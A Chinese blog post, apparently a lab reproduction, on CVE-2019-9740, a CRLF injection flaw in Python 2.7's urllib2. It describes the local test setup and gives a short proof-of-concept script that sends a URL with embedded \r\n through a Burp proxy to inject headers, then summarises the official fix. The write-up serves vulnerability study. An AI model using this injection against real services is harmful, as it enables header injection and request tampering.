(环境搭建+复现)CVE-2019-9740 Python urllib CRLF 注入
程序员文章站
2022-03-24 15:24:36
...
【CNVD编号】
CVE-2019-9740 |
【漏洞名称】
1【靶标分类】
2【漏洞分类】
命令注入
3【漏洞等级】
高
4【漏洞简介】
Python是Python软件基金会的一套开源的、面向对象的程序设计语言。该语言具有可扩展、支持模块和包、支持多种平台等特点。urllib是其中的一个用于处理URL的模块。urllib2是其中的一个用于获取URL(统一资源定位符)的模块。
Python 2.x版本至2.7.16版本中的urllib2和Python 3.x版本至3.7.2版本中的urllib存在注入漏洞。该漏洞源于用户输入构造命令、数据结构或记录的操作过程中,网络系统或产品缺乏对用户输入数据的正确验证,未过滤或未正确过滤掉其中的特殊元素,导致系统或产品产生解析或解释方式错误。
0x01【靶标运行环境】
操作系统:win7专业版
中间件版本:Apache 2.4.23(win32)
编程语言版本:PHP 5.4.45
数据库版本:MySQL 5.5.53
Python版本:2.7.15
工具:burpsuite,phpstudy
【靶标利用过程】
工具:burpsuite,phpstudy
- 编写poc文件1.py,验证漏洞存在
-
# The proxy address and port: import urllib2 proxy_info = { 'host' : '127.0.0.1', 'port' : 8080 } # We create a handler for the proxy proxy_support = urllib2.ProxyHandler({"http" : "http://%(host)s:%(port)d" % proxy_info}) # We create an opener which uses this handler: opener = urllib2.build_opener(proxy_support) # Then we install this opener as the default opener for urllib2: urllib2.install_opener(opener) # Now we can send our HTTP request: url = "http://127.0.0.1?a=1 HTTP/1.1\r\nCRLF-injection: test\r\nTEST: 123:8080/test/?test=a" htmlpage = urllib2.urlopen(url).read() print htmlpage
3、运行poc,这里我们使用urllib2的代理服务到burp上,让我们比较明显的看到漏洞的发生。
官方解决方案
在putrequest方法上对url进行检查,匹配所有的ascii码在00到32的所有字符,并且同时匹配\x7f字符。防止CRLF漏洞的发生。
Referer:
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201903-484